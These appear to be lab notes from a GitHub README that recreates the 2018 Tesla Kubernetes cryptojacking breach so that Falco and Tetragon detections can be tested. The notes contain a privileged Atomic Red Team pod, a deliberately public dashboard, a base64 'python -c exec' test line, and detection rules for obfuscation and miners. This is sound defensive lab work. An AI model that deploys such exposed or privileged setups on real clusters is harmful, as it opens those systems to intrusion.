![Screenshot 2023-10-27 at 14 43 45](https://private-user-images.githubusercontent.com/126002808/278661126-6e579d96-f21c-4547-a8e6-14b60b338e41.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc4NjYxMTI2LTZlNTc5ZDk2LWYyMWMtNDU0Ny1hOGU2LTE0YjYwYjMzOGU0MS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03ZjJhYjMzZDI4MzhlYzZmMThlYjA0YmQ5NDliYWEwOWZmNWVmOWI3Yjc3YjlmYTBmMTUzMGFkYTUwYWFiODAzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.V2iBZEBjQ1mzPPf5pgn0SyLd1zhLL8RPpYLkgKMvBw0)
aws configure --profile nigel-aws-profile
export AWS_PROFILE=nigel-aws-profile
aws sts get-caller-identity --profile nigel-aws-profile
aws eks update-kubeconfig --region eu-west-1 --name tesla-cluster
![Screenshot 2023-10-22 at 19 53 37](https://private-user-images.githubusercontent.com/126002808/277186313-4fa455c7-a17d-4f0f-934a-02b0827add9c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjc3MTg2MzEzLTRmYTQ1NWM3LWExN2QtNGYwZi05MzRhLTAyYjA4MjdhZGQ5Yy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01YmFjZTA5NmFlN2IyZjZhNzdkZDc0OTdmM2Q4M2YyODk2YTYwM2U4NGU4NjE1NTI1ZmZhZDlmYTExM2Q2NmQxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.AQN6XF-8tZ_UMCcWJT9iN4N3DeevlNdCIpMVLr0jUcs)
Confirming the detection rules are present in the current, up-to-date rules feed:
https://thomas.labarussias.fr/falco-rules-explorer/?source=okta
Exposing Falco Sidekick from my EC2 instance:
sudo ssh -i "falco-okta.pem" -L 2802:localhost:2802 ubuntu@ec2-**-***-**-***.eu-west-1.compute.amazonaws.com
Accessing the Sidekick UI via localhost:
http://localhost:2802/events/?since=15min&filter=mitre
Create the namespace for the Atomic Red Team workload:
kubectl create ns atomic-red
Create the deployment from the external issif/atomic-red:latest image:
```shell
kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: atomicred
  namespace: atomic-red
  labels:
    app: atomicred
spec:
  replicas: 1
  selector:
    matchLabels:
      app: atomicred
  template:
    metadata:
      labels:
        app: atomicred
    spec:
      containers:
      - name: atomicred
        image: issif/atomic-red:latest
        imagePullPolicy: "IfNotPresent"
        command: ["sleep", "3560d"]
        securityContext:
          privileged: true
      nodeSelector:
        kubernetes.io/os: linux
EOF
```
Note: this deployment creates a pod called atomicred in the atomic-red namespace:
kubectl get pods -n atomic-red -w | grep atomicred
I successfully deployed the atomic-red
container to my environment:
Use Vim
to create our custom rules:
vi mitre_rules.yaml
```yaml
customRules:
  mitre_rules.yaml: |-
    - rule: Base64-encoded Python Script Execution
      desc: >
        This rule detects base64-encoded Python scripts on command line arguments.
        Base64 can be used to encode binary data for transfer to ASCII-only command
        lines. Attackers can leverage this technique in various exploits to load
        shellcode and evade detection.
      condition: >
        spawned_process and (
          ((proc.cmdline contains "python -c" or proc.cmdline contains "python3 -c" or proc.cmdline contains "python2 -c") and
           (proc.cmdline contains "echo" or proc.cmdline icontains "base64"))
          or
          ((proc.cmdline contains "import" and proc.cmdline contains "base64" and proc.cmdline contains "decode"))
        )
      output: >
        Potentially malicious Python script encoded on command line
        (proc.cmdline=%proc.cmdline user.name=%user.name proc.name=%proc.name
        proc.pname=%proc.pname evt.type=%evt.type gparent=%proc.aname[2]
        ggparent=%proc.aname[3] gggparent=%proc.aname[4] evt.res=%evt.res
        proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid
        proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath
        user.uid=%user.uid user.loginuid=%user.loginuid
        user.loginname=%user.loginname group.gid=%group.gid group.name=%group.name
        image=%container.image.repository:%container.image.tag
        container.id=%container.id container.name=%container.name file=%fd.name)
      priority: warning
      tags:
        - ATOMIC_RED_T1037.004
        - MITRE_TA0005_defense_evasion
        - MITRE_T1027_obfuscated_files_and_information
      source: syscall
      append: false
      exceptions:
        - name: proc_cmdlines
          comps:
            - startswith
          fields:
            - proc.cmdline
```
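A quick way to verify the rule fires is to run a command line inside the monitored pod that matches the second branch of the condition (it contains "import", "base64" and "decode"); the encoded string below is simply print('hi'):

```shell
# Matches the rule's import/base64/decode branch; prints "hi".
python3 -c "import base64; exec(base64.b64decode('cHJpbnQoJ2hpJyk='))"
```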
I'm lazy, so I uninstall and reinstall charts rather than upgrading:
helm uninstall falco -n falco
An alternative way of testing the new mitre_rules.yaml file:
helm install falco -f mitre_rules.yaml falcosecurity/falco --namespace falco \
--create-namespace \
--set tty=true \
--set auditLog.enabled=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set collectors.kubernetes.enabled=true \
--set falcosidekick.webui.redis.storageEnabled=false
Let's delete the Falco pod to ensure the changes have been enforced.
kubectl delete pod -l app.kubernetes.io/name=falco -n falco
Note: a new pod will appear after several seconds. Please be patient.
kubectl get pods -n falco -w
Issues with the environment (the maximum number of VPCs was reached) - disregard:
Add kubernetes-dashboard repository
helm repo add kubernetes-dashboard https://kubernetes.github.io/dashboard/
Deploy a Helm Release named kubernetes-dashboard
using the kubernetes-dashboard chart
helm upgrade --install kubernetes-dashboard kubernetes-dashboard/kubernetes-dashboard --create-namespace --namespace kubernetes-dashboard
![Screenshot 2023-11-03 at 11 39 14](https://private-user-images.githubusercontent.com/126002808/280266084-dd3f0e88-709b-40bd-b486-bf9f49a6801e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjgwMjY2MDg0LWRkM2YwZTg4LTcwOWItNDBiZC1iNDg2LWJmOWY0OWE2ODAxZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jM2JlYTUyODY2ZDQ2NzBiZTRkM2I3YWExNWU2YmFhNmI0OTA4NTFkZDk2MmExMmNjZDJjZWQ5ZWI1MjVjMTg1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.fIsGu3lFnJ7w8DFkBtpt9TY8ykA6_z728fmqRTt9YAU)
helm uninstall kubernetes-dashboard -n kubernetes-dashboard
![Screenshot 2023-11-18 at 23 47 28](https://private-user-images.githubusercontent.com/126002808/284028524-6df07524-7625-4ab1-ac07-b479fd0d061b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDI4NTI0LTZkZjA3NTI0LTc2MjUtNGFiMS1hYzA3LWI0NzlmZDBkMDYxYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1mODk3ZjRhMGY2MTJkYWQ4ODY5MzI5ZDA5YzYyYTZjZDJkZDkxY2Y1OGNiMjA2NGJlYmU2YmYzNjZmYTVkYWU0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9Agf1TLRlWh4hJ-HuE6HUQrkPlwRQ6oj7Fbag_diMM4)
Copying the kubeconfig file from its rightful location to my desktop:
cp ~/.kube/config ~/Desktop/
helm repo add cilium https://helm.cilium.io
helm repo update
helm install tetragon cilium/tetragon -n kube-system
kubectl rollout status -n kube-system ds/tetragon -w
Create a TracingPolicy in Tetragon
kubectl apply -f https://raw.githubusercontent.com/cilium/tetragon/main/examples/tracingpolicy/tcp-connect.yaml
Open an activity tail for Tetragon (Terminal 2):
kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f | tetra getevents -o compact --namespace default --pod tesla-app
Open an event output for Falco (Terminal 3):
kubectl logs --follow -n falco -l app.kubernetes.io/instance=falco | grep k8s.pod=tesla-app
![Screenshot 2023-11-18 at 20 31 20](https://private-user-images.githubusercontent.com/126002808/284021938-c31688f9-5765-4f0c-baae-884451575e78.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDIxOTM4LWMzMTY4OGY5LTU3NjUtNGYwYy1iYWFlLTg4NDQ1MTU3NWU3OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yNmNmMjRhMThkMDY5N2RkYzNjYjJiZTdlNmRhNWRjMDg3MGMzOTNjYTRlNDQyYzlkMzFjZDM2NjBjZGU3MGE3JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.vFKNgrcVstjMge485yshmeIu1jTsqXU0VzXBTbqsSbo)
Now we apply a Tetragon TracingPolicy that performs a SIGKILL action when the mining binary is run:
https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/sigkill-miner.yaml
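The referenced sigkill-miner.yaml is not reproduced here, but Tetragon enforcement policies of this kind broadly follow one pattern: hook a call, match the offending binary, and attach a Sigkill action. A rough sketch under that assumption (the policy name, hook and miner path below are illustrative, not the file's actual contents):

```yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: sigkill-miner-demo        # illustrative name
spec:
  kprobes:
  - call: "sys_execve"            # hook process execution
    syscall: true
    args:
    - index: 0
      type: "string"              # the binary path being executed
    selectors:
    - matchArgs:
      - index: 0
        operator: "Equal"
        values:
        - "/tmp/xmrig"            # illustrative miner path
      matchActions:
      - action: Sigkill           # kill the offending process
```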
![Screenshot 2023-11-18 at 20 40 11](https://private-user-images.githubusercontent.com/126002808/284022322-02a6f86d-61fb-4537-b7a5-66e75d4bb598.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDIyMzIyLTAyYTZmODZkLTYxZmItNDUzNy1iN2E1LTY2ZTc1ZDRiYjU5OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1lZmJmOGM4OWYyOThlZWI5OWM4NmJjNWU2MmY1MmFjOWU1N2Y3ODdmMDhjYzRjODg3MWI4MWE4MjUyMDQyZGZlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.6BFoKHKUwzy8FvSnclW3M7Km-Ticl-LCI350KC7iiZw)
Base64 encoding, mining binaries and mining pools - all of the detections fired! :)
helm install falco falcosecurity/falco \
-n falco \
--version 3.3.0 \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set collectors.kubernetes.enabled=true \
--set falcosidekick.webui.redis.storageEnabled=false \
-f custom-rules.yaml
Deploy Kubernetes Dashboard:
kubectl apply -f https://raw.githubusercontent.com/nigeldouglas-itcarlow/2018-Tesla-Data-Breach/main/public-dashboard.yaml
![Screenshot 2023-11-18 at 23 59 08](https://private-user-images.githubusercontent.com/126002808/284028807-aca83730-ff4b-4c58-a949-8f48dce9c608.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzkyNTQ0NTMsIm5iZiI6MTczOTI1NDE1MywicGF0aCI6Ii8xMjYwMDI4MDgvMjg0MDI4ODA3LWFjYTgzNzMwLWZmNGItNGM1OC1hOTQ5LThmNDhkY2U5YzYwOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMjExJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDIxMVQwNjA5MTNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1jMGUwMDg1ZGYwZGFhMTliNmRjYjkxMWUwZDE5YjRkOWI4ZjA5ZTY4ZTUyZjMyODY5YjJhNjQ0Y2Y3MmFlNjFkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.eZB4lQjCqm38wMBj8Drm8N0wpKezFan3hiiNIfx3vN8)